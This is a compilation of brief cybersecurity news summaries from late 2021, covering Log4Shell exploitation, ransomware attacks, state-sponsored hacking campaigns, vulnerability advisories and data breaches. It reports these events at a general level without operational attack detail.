    State-sponsored hackers from China, Iran, North Korea and Turkey have started testing, exploiting and using the Log4j bug to deploy malware, including ransomware, according to Microsoft. As predicted by officials at the US Cybersecurity and Infrastructure Security Agency (CISA), more sophisticated attackers have now started exploiting the so-called Log4Shell bug (CVE-2021-44228), which affects devices and applications running vulnerable versions of the Log4j Java library. It's a potent flaw that allows remote attackers to take over a device after compromise.

    CISA: Immediate Steps to Strengthen Critical Infrastructure against Potential Cyberattacks

    In the lead up to the holidays and in light of persistent and ongoing cyber threats, CISA urges critical infrastructure owners and operators to take immediate steps to strengthen their computer network defenses against potential malicious cyber attacks. Sophisticated threat actors, including nation-states and their proxies, have demonstrated capabilities to compromise networks and develop long-term persistence mechanisms. These actors have also demonstrated capability to leverage this access for targeted operations against critical infrastructure with potential to disrupt National Critical Functions.

    Second log4j Vulnerability Discovered, Patch to version 2.16

    A second vulnerability involving Apache Log4j was found on Tuesday after cybersecurity experts spent days attempting to patch or mitigate CVE-2021-44228. The description of the new vulnerability, CVE 2021-45046, says the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was "incomplete in certain non-default configurations." "This could allow attackers... to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack," the CVE description says.

    ‘Seedworm’ Attackers Target Telcos in Asia, Middle East

    Attackers targeting telcos across the Middle East and Asia for the past six months are linked to Iranian state-sponsored hackers, according to researchers. The cyberespionage campaigns leverage a potent cocktail of spear phishing, known malware and legitimate network utilities that are leveraged to steal data and potentially disrupt supply-chains.

    Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware

    Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability. The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files.

    Western Digital Sandisk Secureaccess Flaws Allow Brute Force and Dictionary Attacks

    Western Digital has released updates for its SanDisk SecureAccess software to fix multiple vulnerabilities that can be exploited to access user data by carrying out brute force and dictionary attacks. The SanDisk SecureAccess software, now rebranded SanDisk PrivateAccess, allows storing and protecting critical and sensitive files on SanDisk USB flash drives. The access to the user's private vault is protected by a personal password, and all the files are automatically encrypted.

    Kronos Ransomware Attack May Cause Weeks of HR Solutions Downtime

    Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks. Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.

    Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under Exploitation

    The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.

    Researchers Explore Microsoft Outlook Phishing Techniques

    Some of the tools built into Outlook to boost productivity and collaboration could also make it easier to launch effective social engineering campaigns, researchers say.
    In early December, researchers with Avanan discovered a way in which Outlook's features could be used to make an attacker appear more credible in a phishing or business email compromise (BEC) attack. Their attack started with a spoofed email. If an attacker had a private server, they could launch a domain impersonation attack with an email pretending to come from another sender

    Kali Linux 2021.4 Released with 9 New Tools, Further Apple m1 Support

    Kali Linux 2021.4 was released today by Offensive Security and includes further Apple M1 support, increased Samba compatibility, nine new tools, and an update for all three main desktops.
    Kali Linux is a Linux distribution allowing cybersecurity professionals and ethical hackers to perform penetration testing and security audits against internal and remote networks. With this release, the Kali Linux Team introduces a bunch of new features, including: Apple M1 support for the VMware Fusion Public Tech Preview Wide compatibility is enabled for Samba Making it easier to switch to Cloudflare's package manager mirror Kaboxer updated with support for window themes and icon theme Updates to the Xfce, GNOME and KDE desktops Raspberry Pi Zero 2 W + USBArmory MkII ARM images Nine more tools

    A Zero-day Exploit for Log4j Java Library Could Have a Tsunami Impact on IT Giants

    Experts publicly disclose Proof-of-concept exploits for a critical remote code execution zero-day vulnerability, tracked a CVE-2021-44228 (aka Log4Shell), in the Apache Log4j Java-based logging library. The Chinese security researcher p0rz9 who publicly disclosed the PoC exploit code revealed that the CVE-2021-44228 can only be exploited if the log4j2.formatMsgNoLookups option is set to false.

    Vulnerability Alert: Elevated Ransomware Risk in Unpatched, EOL SonicWall SRA and SMA 8.x Products

    Mandiant (previously FireEye) and Sonicwall joined forces and discovered that ransomware actors are currently leveraging previously disclosed Sonicwall vulnerabilities to deploy ransomware on networks. As in the past, threat actors are actively targeting Secure Mobile Access (SMA) 100 series and Secure Remote Access (SRA) products running unpatched and end-of-life (EOL) 8.x firmware in and using stolen credentials.

    Line Pay Leaks Data from Approximately 133,000 Users to Github of All Places

    LINE Pay, a smartphone payment provider, announced yesterday that between September and November of this year, approximately 133,000 users’ payment details were inadvertently published on GitHub. A research group employee accidentally uploaded files detailing participants in a LINE Pay promotional programme staged between late December 2020 and April 2021 to the collaborative coding crèche.

    Was Threat Actor KAX17 De-anonymizing the Tor Network?

    A mysterious threat actor has run thousands of malicious servers in entry, middle, and exit positions of the Tor network. Tracked as KAX17, the threat actor ran at its peak more than 900 malicious servers part of the Tor network, which typically tends to hover around a daily total of up to 9,000-10,000. Servers added to the Tor network typically must have contact information included in their setup, such as an email address, so Tor network administrators and law enforcement can contact server operators in the case of a misconfiguration or file an abuse report.

    Arrow RAT: new malware launched on darknet forums

    A new remote access Trojan (RAT) known as Arrow RAT has been promoted on the darknet forum XSS by the user Mega_Knight. According to @Mega_Knight, Arrow RAT contains numerous features that are typical of RATs. This includes: Keylogging, Registry modification, Extraction of passwords stored in browsers, Hide files or folders. Arrow RAT also contains a hidden virtual network computing (hVNC) module, enabling the attacker to launch a hidden virtual desktop on an infected device.

    Sonicwall ‘Strongly Urges’ Customers to Patch Critical SMA 100 Bugs

    SonicWall 'strongly urges' organizations using SMA 100 series appliances to immediately patch them against multiple security flaws rated with CVSS scores ranging from medium to critical. The bugs (reported by Rapid7's Jake Baines and NCC Group's Richard Warren) impact SMA 200, 210, 400, 410, and 500v appliances even when the web application firewall (WAF) is enabled.

    Canadian Indicted for Launching Ransomware Attacks on Orgs in US, Canada

    Officials from the Ontario Provincial Police held a press conference on Tuesday to announce the charges and Philbert's arrest in Ottawa. In a statement, US Attorney Bryan Wilson of the District of Alaska said Philbert "conspired with others known and unknown to the United States to damage computers, and in the course of that conspiracy did damage a computer belonging to the State of Alaska in April 2018." Wilson and Canadian officials noted that they received help in the case from Dutch authorities and Europol

    Emotet Directly Drops Cobalt Strike Beacons Without Intermediate Trojans

    Emotet malware now directly installs Cobalt Strike beacons to give the attackers immediate access to the target network and allow them to carry out malicious activities, such as launching ransomware attacks. In a classic attack chain, the Emotet malware would install the TrickBot or Qbot trojans on infected devices, which in turn would deploy Cobalt Strike on an infected system. Emotet research group Cryptolaemus recently noticed a switch in the tactics of Emotet operators, which now are directly installing Cobalt Strike beacons on infected devices without installing the above intermediate Trojans.

    Unitrends Security Advisory

    Multiple vulnerabilities were recently reported to Unitrends and Kaseya within the Unitrends Recovery Series and Unitrends Agent Software. Unitrends and Kaseya gave high priority to these reports, as the company does with any report of a potential security issue, and has addressed the following vulnerabilities with the 10.5.5 software release.

    Someone Is Running Lots of Tor Relays

    Since 2017, someone is running about a thousand — 10% of the total — Tor servers in an attempt to deanonymize the network: Grouping these servers under the KAX17 umbrella, Nusenu says this threat actor has constantly added servers with no contact details to the Tor network in industrial quantities, operating servers in the realm of hundreds at any given point. The actor’s servers are typically located in data centers spread all over the world and are typically configured as entry and middle points primarily, although KAX17 also operates a small number of exit points.

    A Critical Zoho ManageEngine Desktop Central and Desktop Central MSP Vulnerability Is Exploited by an APT Actor

    Zoho ManageEngine Desktop Central is a popular management tool that administrators use for automatic software distribution and remote troubleshooting across the whole network. An authentication bypass vulnerability in ManageEngine Desktop Central MSP has been discovered, allowing an attacker to overcome authentication and execute arbitrary code on the Desktop Central MSP server.

    Twitter Bots Pose as Support Staff to Steal Your Cryptocurrency

    Scammers monitor every tweet containing requests for support on MetaMask, TrustWallet, and other popular crypto wallets, and respond to them with scam links in just seconds. To conduct these targeted phishing attacks, scammers abuse Twitter APIs that allow them to monitor all public tweets for specific keywords or phrases.

    QNAP Warns Users of Bitcoin Miner Targeting Their NAS Devices

    QNAP warned customers today of ongoing attacks targeting their NAS (network-attached storage) devices with cryptomining malware, urging them to take measures to protect them immediately The cryptominer deployed in this campaign on compromised devices will create a new process named [oom_reaper] that will mine for Bitcoin cryptocurrency.

    Zoho: ManageEngine Desktop Central and Desktop Central MSP

    Zoho has released a security advisory to address an authentication bypass vulnerability in ManageEngine Desktop Central and Desktop Central MSP. An authentication bypass vulnerability in ManageEngine Desktop Central that could result in remote code execution. If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution. The severity of this vulnerability to be critical.

    Suspected Russian Activity Targeting Government and Business Entities Around the Globe

    As the one-year anniversary of the discovery of the SolarWinds supply chain compromise passes, Mandiant remains committed to tracking one of the toughest actors we have encountered. These suspected Russian actors practice top-notch operational security and advanced tradecraft. However, they are fallible, and we continue to uncover their activity and learn from their mistakes. Ultimately, they remain an adaptable and evolving threat that must be closely studied by defenders seeking to stay one step ahead.

    Magnat Malvertising Campaigns Spreads Malicious Chrome Extensions, Backdoors and Info Stealers

    Talos researchers spotted a series of malvertising campaigns using fake installers of popular apps and games as a lure to trick users into downloading a new backdoor and an undocumented malicious Google Chrome extension. According to Talos, the threat actor has been active at least since late 2018, experts observed intermittent activity towards the end of 2019 and through early 2020. The group resurfaced in April 2021, the malvertising campaigns targeted users in Canada, the U.S., Australia, Italy, Spain, and Norway.

    Malicious KMSPico Windows Activator Stealing Users' Cryptocurrency Wallets

    Users looking to activate Windows without using a digital license or a product key are being targeted by tainted installers to deploy malware designed to plunder credentials and other information in cryptocurrency wallets. KMSPico is an unofficial tool that's used to illicitly activate the full features of pirated copies of software such as Microsoft Windows and Office suite without actually owning a license key.

    Microsoft Offers 50% Subscription Discounts to Office Pirates

    Microsoft is offering discounts of up to 50% on Microsoft 365 subscriptions to those using pirated versions of Microsoft Office willing to switch to a genuine version. This promotional offer is sent to Office users if Microsoft detects the version installed is non-genuine, and it shows as an alert under the top menu as first reported by Ghacks

    PHISHING CAMPAIGNS BY THE NOBELIUM INTRUSION SET

    Since February 2021, ANSSI has dealt with a series of phishing campaigns directed against French entities. The campaigns escalated significantly in May 2021. This malicious activity is attributable to one and the same intrusion set. The intrusion set succeeded in compromising email accounts belonging to French organisations, before using these access points to send weaponised emails to foreign institutions in the diplomatic sector. The initial method of intrusion remains unknown.

    Researchers Discover 14 New XS-Leak Web Browser Attacks

    IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have discovered 14 new types of 'XS-Leak' cross-site leak attacks against modern web browsers, including Google Chrome, Microsoft Edge, Safari, and Mozilla Firefox. These types of side-channel attacks are called 'XS-Leaks,' and allow attacks to bypass the 'same-origin' policy in web browsers so that a malicious website can steal info in the background from a trusted website where the user enters information.

    Colorado Energy Company Loses 25 Years of Data after Cyberattack While Still Rebuilding Network

    Colorado's Delta-Montrose Electric Association (DMEA) is still struggling to recover from a devastating cyberattack last month that took down 90% of its internal systems and caused 25 years of historical data to be lost. In an update sent to customers this week, the company said it expects to be able to begin accepting payments through its SmartHub platform and other payment kiosks during the week of December 6. "We also tentatively estimate we will be able to resume member billing the week of December 6 - 10. We recognize this will result in members receiving multiple energy bills close together. As a reminder, we will not disconnect services for non-payment or assess any penalties through January 31, 2022," the company said on a page that has been updated repeatedly over the last month.

    Twitter Removes 3,400 Accounts Used in Govt Propaganda Campaigns

    Twitter today announced the permanent removal of more than 3,400 accounts linked to governments of six countries running manipulation or spam campaigns. The social networking company says that the accounts were used in eight distinct operations attributed to Mexico, the People's Republic of China (PRC), Russia, Tanzania, Uganda, and Venezuela

    Phishing Actors Start Exploiting the Omicron COVID-19 Variant

    “Phishing actors have quickly started to exploit the emergence of the Omicron COVID-19 variant and now use it as a lure in their malicious email campaigns” Threat actors will quickly adjust their phishing email content to match that of hot topics and trends. Preying on people’s urgency and fear can help make phishing campaigns more successful. A user may rush to open an email without thinking it through.

    Planned Parenthood LA Discloses Data Breach after Ransomware Attack

    Planned Parenthood Federation of America, Inc., or Planned Parenthood, is a nonprofit organization that provides reproductive health care in the United States and globally. The organization has disclosed a data breach after suffering a ransomware attack in October that exposed the personal information of approximately 400,000 patients.

    Former Ubiquiti Dev Charged for Trying to Extort His Employer

    Ubiquiti Inc. is an American technology company founded in San Jose, California, in 2003. Now based in New York City, Ubiquiti manufactures and sells wireless data communication and wired products for enterprises and homes under multiple brand names. Nickolas Sharp, a former employee of the networking device maker was arrested and charged with data theft and attempting to extort his employer while posing as a whistleblower and an anonymous hacker.

    Double Extortion Ransomware Victims Soar 935%

    Researchers have recorded a 935% year-on-year increase in double extortion attacks, with data from over 2300 companies posted onto ransomware extortion sites. Group-IB’s Hi-Tech Crime Trends 2021/2022 report covers the period from the second half of 2020 to the first half of 2021. Ransomware-as-a-Service (RaaS) groups have partnered with initial access brokers which has created a large increase in ransomware attacks. Ransomware operators have had affiliates for some time who would provide them with access to networks. Now prominent ransomware groups are leveraging initial access broker communities to improve both their attack surface and profits. Increasing profits from ransomware attacks has created an equally profitable market for criminals interested in selling initial access to various groups.

    Europol Arrested 1800 Money Mules as Part of an Anti-money-laundering Operation

    Europol has identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7. The operation is the result of a joint effort of 27 countries, Eurojust, INTERPOL, the European Banking Federation (EBF), and the FinTech FinCrime Exchange. The name EMMA is an acronym for European Money Mule Action operation, the first EMMA operation led by Europol took place in 2016

    Ransomware Attack Shuts Down Lewis & Clark Community College

    Lewis and Clark Community College in Godfrey, ILL closed all their campuses this week and cancelled all extra-curricular activities, including sports. The move was made after the director of information technology noticed suspicious activity last Tuesday and shut down the school's computer network on Wednesday.

    Queensland Government Energy Generator Hit by Ransomware

    Queensland government-owned energy generator CS Energy said on Tuesday it was responding to a ransomware incident that occurred over the weekend. First reported by Energy Source & Distribution, the company said the incident has not impacted electricity generation at Callide and Kogan Creek power station, and it was looking to restore its network.

    Yanluowang Ransomware Operation Matures with Experienced Affiliates

    An affiliate of the recently discovered Yanluowang ransomware operation is focusing its attacks on U.S. organizations in the financial sector using BazarLoader malware in the reconnaissance stage. Based on observed tactics, techniques, and procedures, the threat actor is experienced with ransomware-as-a-service (RaaS) operations and may be linked with the Five Hands group.

    Spy Chief's Warning: Our Foes Are Now 'Pouring Money' into Quantum Computing and AI

    The rise of technologies like artificial intelligence (AI) and quantum computing is changing the world -- and intelligence services must adapt in order to operate in an increasingly digital environment, the head of MI6 has warned. In his first public speech since taking the role of "C" in October 2020, Richard Moore, chief of the UK Secret Intelligence Service (MI6), discussed the challenges posed by the rapid evolution in technology.

    DNA Testing Firm Discloses Data Breach Affecting 2.1 Million People

    DNA Diagnostics Center (DDC), an Ohio-based DNA testing company, has disclosed a hacking incident that affects 2,102,436 persons. The incident resulted in a confirmed data breach that occurred between May 24, 2021, and July 28, 2021, but the firm discovered it only on October 29, 2021
    The information that the hackers accessed includes the following:
    Full names Credit card number + CVV Debit card number + CVV Financial account number Platform account password The database contained older backups from 2004-2012 and was not linked to active systems. “DDC acquired certain assets from this national genetic testing organization in 2012 that included certain personal information, and therefore, impacts from this incident are not associated with DDC,” said the organization.

    Panasonic Discloses Data Breach After Network Hack

    Japanese multinational conglomerate Panasonic disclosed a security breach after unknown threat actors gained access to servers on its network this month. "Panasonic Corporation has confirmed that its network was illegally accessed by a third party on November 11, 2021," the company said in a press release issued Friday. "As the result of an internal investigation, it was determined that some data on a file server had been accessed during the intrusion."

    Wind Turbine Maker Vestas Confirms Recent Security Incident Was Ransomware

    Wind turbine maker Vestas says "almost all" of its IT systems are finally up and running 10 days after a security attack by criminals, confirming that it had indeed fallen victim to ransomware. Alarm bells rang the weekend before last when the Danish organisation said it had identified a "cyber security incident" and closed off parts of its tech estate to "contain the issue.

    APT37 Targets Journalists with Chinotto Multi-Platform Malware

    North Korean state hacking group APT37 targets South Korean journalists, defectors, and human rights activists in watering holes, spear-phishing emails, and smishing attacks delivering malware dubbed Chinotto capable of infecting Windows and Android devices. APT37 (aka Reaper) has been active since at least 2012 and is an advanced persistent threat group (APT) linked to the North Korean government with high confidence by FireEye.

    Biopharmaceutical Firm Supernus Pharmaceuticals Hit by Hive Ransomware During an Ongoing Acquisition

    Biopharmaceutical company Supernus Pharmaceuticals confirmed it was the victim of a data breach after a ransomware attack that hit the firm last in Mid-November. The Company states that the security breach did not impact its operations, it notified government authorities and engaged cybersecurity experts and its outside law firm to respond to the incident. Supernus Pharmaceuticals also declared to have successfully recovered the encrypted files and has taken additional security measures to prevent future incidents.

    Experts Warn of Attacks Exploiting CVE-2021-40438 Flaw in Apache HTTP Server

    Threat actors are exploiting a recently addressed server-side request forgery (SSRF) vulnerability, tracked as CVE-2021-40438, in Apache HTTP servers. The CVE-2021-40438 flaw can be exploited against httpd web servers that have the mod_proxy module enabled. A threat actor can trigger the issue using a specially crafted request to cause the module to forward the request to an arbitrary origin server

    Apple Sues NSO Group Over Pegasus Spyware

    Apple on Tuesday filed a lawsuit against mercenary spyware company NSO Group and its parent company, seeking a permanent injunction that bans NSO Group from using any Apple software, services, or devices. The complaint also provides new information on how NSO Group infected victims' Apple devices with its Pegasus spyware. State-sponsored actors like the NSO Group spend millions of dollars on sophisticated surveillance technologies without effective accountability. That needs to change," said Craig Federighi, Apple SVP of Software Engineering, said in a statement. "While these cybersecurity threats only impact a very small number of our customers, we take any attack on our users very seriously, and we're constantly working to strengthen the security and privacy protections in iOS to keep all our users safe.

    Industry Group Sounds Alarm over 'Tardigrade' Malware Targeting Biomanufacturing Sector

    A group of likely foreign government-sponsored hackers is behind cyberattacks on two bio-manufacturing companies that occurred this year, using a kind of malware capable of operating with independence within a network, an industry group warned. The Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) dubbed the malware “Tardigrade” after the resilient micro-animal, and said it looks like the work of an advanced persistent threat group, a term that most often refers to government-backed attacker.

    Biometric Auth Bypassed Using Fingerprint Photo, Printer, and Glue

    Researchers demonstrated that fingerprints could be cloned for biometric authentication for as little as $5 without using any sophisticated or uncommon tools. Although fingerprint-based biometric authentication is generally considered superior to PINs and passwords in terms of security, the fact that imprints can be left in numerous public places makes it ripe for abuse.

    Over 4000 UK Retailers Compromised by Magecart Attacks

    UK government security experts have been forced to notify over 4000 domestic online businesses that their websites were infected with digital skimming code. GCHQ agency, the National Cyber Security Centre (NCSC), informed 4151 compromised online shops until the end of September. Most of these were exploited via a known bug in the popular Magento e-commerce software. The NCSC argued digital retailers needed to get their house in order ahead of the busy festive shopping period, which begins at the end of this week with the Black Friday weekend.

    6M Sky Routers Vulnerable to Cyberattacks

    The Sky is a UK-based provider of broadband, Sky Broadband being a service employed by Sky UK. 6M Sky routers have been left exposed to cyberattacks for almost 18 months, meaning a year and a half while the company was trying to remediate a DNS rebinding flaw in the routers of the customers.

    FBI Warning: This Zero-day VPN Software Flaw was Exploited by APT Hackers

    The FBI has warned that a sophisticated group of attackers have exploited a zero-day flaw in a brand of virtual private networking (VPN) software since May. The FBI said its forensic analysis showed that the exploitation of the zero-day vulnerability in the FatPipe WARP, MPVPN, and IPVPN software, by an advanced persistent threat (APT) group, went back to at least May 2021. It did not provide any further information about the identity of the group.

    Vestas impacted by cyber security incident

    Vestas Wind Systems, one of the world's largest makers of wind turbines, today confirmed company data had been compromised in a "cyber security incident" that forced the firm to isolate parts of its I.T. infrastructure. To contain the issue, I.T. systems were shut down across multiple business units and locations.

    New Memento Ransomware Uses Password-protected WinRAR Archives to Block Access to the Files

    In October, Sophos researchers spotted a ransomware called Memento that adopts a curious approach to block access to a victims files. The ransomware copies files into password-protected WinRAR archives; it uses a renamed freeware version of the legitimate file utility WinRAR. The Memento ransomware then encrypts the password and deletes the original files from the victim’s system.

    Rising Cyber Insurance Premiums Highlight Importance of Ransomware Prevention

    A point noted in this report is that insurers often will not cover the total amount of a security incident, meaning that cyber insurance payouts can help only so much. According to the report and news we have shared throughout 2021, ransomware attacks are rising. They will continue to be somewhat lucrative for those involved, especially if insurers continue to honor payouts and meet ransomware demands. According to the report, one client said that they received requests for 30+ ransomware payouts in their first year of operation.

    CISA Publishes Cybersecurity Playbooks for FCEB Agencies

    On November 16, 2021, The US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) published the Cybersecurity Incident & Vulnerability Response Playbooks: Operational Procedures for Planning and Conducting Cybersecurity Incident and Vulnerability Response Activities in FCEB Information Systems.

    Revealed: The 200 Most used and Worst Passwords of 2021

    According to a report from NordPass, people are still using passwords such as ”123456,” ”12345,” ”password,” and ”qwerty.” Research reveals that these three are the weakest passwords nowadays and can easily make you vulnerable to hacking. The password 123456 appeared over 103 million times in NordPass’s research.

    OTPBlitz: New OTP retrieval service launched on darknet forum

    A new service known as OTPBlitz has been launched on the darknet forum XSS. OTPBlitz is designed to enable criminals to retrieve one-time passcodes (OTP) from victims by calling them directly and using text-to-speech software to impersonate platforms or services which utilise OTP. The operators target specific platforms or services, such as banks or payment providers, and then attempt to use social engineering via ‘scripts’ read by text-to-speech software to persuade victims to share their OTP.

    China's APT41 Manages Library of Breached Certificates

    A freelance Chinese APT group is actively managing a library of compromised code-signing digital certificates to support cyber-espionage attacks targeting supply chain vendors, according to Venafi. The security vendor’s latest research report details the work of APT41, an unusual group in that it has previously been observed carrying out attacks for both traditional state-sponsored cyber-espionage and personal financial gain.

    US, UK and Australia Warn of Iran-linked APTs Exploiting Fortinet, Microsoft Exchange Flaws

    A joint advisory released by government agencies (the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC)) in the U.S., U.K., and Australia warns that Iran-linked threat actors are exploiting Fortinet and Microsoft Exchange vulnerabilities in attacks aimed at critical infrastructure in the US and Australian organizations.

    FBI FLASH: AC-000155

    As of November 2021, FBI forensic analysis indicated exploitation of a 0-day vulnerability in the FatPipe MPVPN® device software1 going back to at least May 2021. The vulnerability allowed APT actors to gain access to an unrestricted file upload function to drop a webshell for exploitation activity with root access, leading to elevated privileges and potential follow-on activity. Exploitation of this vulnerability then served as a jumping off point into other infrastructure for the APT actors. This vulnerability is not yet identified with a CVE number but can be located with the FatPipe Security Advisory number FPSA006. The vulnerability affects all FatPipe WARP®, MPVPN, and IPVPN® device software prior to the latest version releases 10.1.2r60p93 and 10.2.2r44p1.

    Threat Actors Offer Millions for Zero-days, Developers Talk of Exploit-as-A-service

    One forum user in early May offered $25,000 for proof-of-concept (POC) exploit code for CVE-2021-22893, a critical-severity vulnerability in Pulse Secure VPN that Chinese hackers had leveraged since at least April. Another actor with deeper pockets claimed a budget of up to $3 million for no-interaction remote code execution (RCE) bugs, the so-called zero-click exploits, for Windows 10 and Linux. The same user offered up to $150,000 for original solutions for "unused startup methods in Windows 10" so malware would be active every time the system booted.

    Threat Actors Offer Millions for Zero-days, Developers Talk of Exploit-as-A-service

    As of November 2021, FBI forensic analysis indicated exploitation of a 0-day vulnerability in the FatPipe MPVPN device software1 going back to at least May 2021. The vulnerability allowed APT actors to gain access to an unrestricted file upload function to drop a web shell for exploitation activity with root access, leading to elevated privileges and potential follow-on activity. The exploitation of this vulnerability then served as a jumping-off point into other infrastructure for the APT actors.

    DDoS Attacks Surge 35% in Q3 as VoIP is Targeted

    Security experts have warned of a surge in distributed denial of service (DDoS) attacks in the third quarter, with quantity, size and complexity all increasing in the period. The findings come from Lumen’s Q3 DDoS Report, which revealed that the firm mitigated 35% more attacks in the quarter than Q2 2021. The vendor claimed that the largest bandwidth attack it tackled during the period was 612 Gbps — a 49% increase over Q2. The largest packet rate-based attack scrubbed was 252 Mbps — a 91% increase.

    Now Iran's State-backed Hackers are Turning to Ransomware

    Microsoft has detailed the activities of six Iranian hacker groups that are behind waves of ransomware attacks that have arrived every six to eight weeks since September 2020. Russia is often seen as the home of the biggest cyber-criminal ransomware threats, but state-sponsored attackers from North Korea and Iran have also shown a growing interest in ransomware.

    Intel Addresses 2 High-severity Issues in BIOS Firmware of Several Processors

    Intel disclosed two high-severity vulnerabilities that affect the BIOS firmware in several processor families; both vulnerabilities have received a CVSS v3 score of 8.2. The vulnerabilities, tracked as CVE-2021-0157 and CVE-2021-0158, were discovered by researchers at SentinelOne and can be exploited by an attacker with physical access to the device to elevate privileges.

    New Rowhammer Technique Bypasses Existing DDR4 Memory Defenses

    “Researchers have developed a new fuzzing-based technique called 'Blacksmith' that revives Rowhammer vulnerability attacks against modern DRAM devices that bypasses existing mitigations. The emergence of this new Blacksmith method demonstrates that today's DDR4 modules are vulnerable to exploitation, allowing a variety of attacks to be conducted”

    FBI's Email System Hacked to Send Out Fake Cyber Security Alert to Thousands

    ON SATURDAY, the U.S. Federal Bureau of Investigation (FBI) confirmed unidentified threat actors have breached one of its email servers to blast hoax messages about a fake "sophisticated chain attack." The incident, which was first publicly disclosed by threat intelligence non-profit SpamHaus, involved sending rogue warning emails with the subject line "Urgent: Threat actor in systems" originating from a legitimate FBI email address "eims@ic.fbi[.]gov" that framed the attack on Vinny Troia, a security researcher and founder of dark web intelligence firms Night Lion Security and Shadowbyte, while also claiming him to be affiliated with a hacking outfit named TheDarkOverlord.

    North Korean Hackers Target Cybersecurity Researchers with Trojanized IDA Pro

    Also known by the monikers APT38, Hidden Cobra, and Zinc, the Lazarus Group was active as early as 2009 and linked to a string of attacks for financial gain and harvesting sensitive information from compromised environments. Lazarus, the North Korea-affiliated state-sponsored group, is attempting to once again target security researchers with backdoors and remote access trojans using a trojanized pirated version of the popular IDA Pro reverse engineering software.

    Exchange Exploit Leads to Domain Wide Ransomware

    ProxyShell is a name given to a combination of three vulnerabilities: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. An attacker chaining the exploitation of these vulnerabilities could execute arbitrary code with SYSTEM privileges on Exchange servers.

    Microsoft Has Released Out-of-Band Security Updates To Address Authentication Issues Affecting Windows Server

    Microsoft has released out-of-band updates to fix authentication failures related to Kerberos delegation scenarios impacting Domain Controllers (DC) running Windows Server. These issues impact Windows Server 2019 and lower versions, including Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2.

    Emotet Malware Is Back and Rebuilding Its Botnet via Trickbot

    The Emotet malware was considered the most widely spread malware in the past, using spam campaigns and malicious attachments to distribute the malware. Emotet would then use infected devices to perform other spam campaigns and install other payloads, such as the QakBot (Qbot) and Trickbot malware. These payloads would then be used to provide initial access to threat actors to deploy ransomware, including Ryuk, Conti, ProLock, Egregor, and many others.

    TeamTNT Group Targets Poorly Configured Docker Servers Exposing REST APIs

    Trend Micro researchers reported that TeamTNT hackers are targeting poorly configured Docker servers exposing Docker REST APIs as part of an ongoing campaign that started in October. Threat actors execute malicious scripts to deploy Monero cryptocurrency miners, perform container-to-host escape using well-known techniques, and scan the Internet for exposed ports from other compromised containers.

    CVE-2021-3064 PAN-OS: Memory Corruption Vulnerability in GlobalProtect Portal and Gateway Interfaces

    Palo Alto Networks issued a critical security advisory for CVE-2021-3064, where a Memory Corruption Vulnerability was discovered in GlobalProtect Portal and Gateway Interfaces. The advisory states that, “A memory corruption vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to disrupt system processes and potentially execute arbitrary code with root privileges. The attacker must have network access to the GlobalProtect interface to exploit this issue.”

    Spike in Conti Ransomware Attacks

    I wanted to let you know that we received information from an internal source that a company in the telecommunications industry or otherwise provides services to those in the field has confirmed a breach likely on behalf of Conti ransomware operators or its affiliates.

    Medical Software Firm Urges Password Resets after Ransomware Attack

    Medatixx, a German medical software vendor whose products are used in over 21,000 health institutions, urges customers to change their application passwords following a ransomware attack that has severely impaired its entire operations. The firm clarified that the impact has not reached clients and is limited to their internal IT systems and shouldn't affect any of their PVS (practice management systems)

    Meet Lyceum: Iranian Hackers Targeting Telecoms, ISPs

    Researchers have provided a deep dive into the activities of Lyceum, an Iranian threat group focused on infiltrating the networks of telecoms companies and internet service providers (ISPs). Lyceum, also known as Hexane, Siamesekitten, or Spirlin, has been active since 2017. The advanced persistent threat (APT) group has been linked to campaigns striking Middle Eastern oil and gas companies in the past and now appears to have expanded its focus to include the technology sector.

    TA505 Shifts Focus from Malspam to Exploitation of Vulnerabilities

    TA505, also known as FIN11, Buhtrap, Ratopak Spider, Silence, and Gold Evergreen, depending on the security vendor and or company, has a long history of breaching companies through various initial access vectors. FIN11 activity has been reported since approximately 2006 and is considered one of the most significant financially motivated threat actors because of the large volumes of messages they send to targeted organizations.

    US Charges Ukrainian National for Kaseya Ransomware Attack

    Earlier this year, the attack against Kaseya products had devastating consequences for MSPs, downstream customers, and companies alike. According to multiple sources, five individuals from various parts of the globe have been arrested since February 2021. These five are believed to have been responsible for deploying REvil on systems belonging to some 5,000 organizations.

    Five Affiliates to Sodinokibi/Revil Unplugged

    On 4 November, Romanian authorities arrested two individuals suspected of cyber-attacks deploying the Sodinokibi/REvil ransomware. They are allegedly responsible for 5,000 infections, which in total pocketed half a million euros in ransom payments.

    Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Web shells, NGLit

    Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Web shells, NGLite Trojan, and KdcSponge Stealer
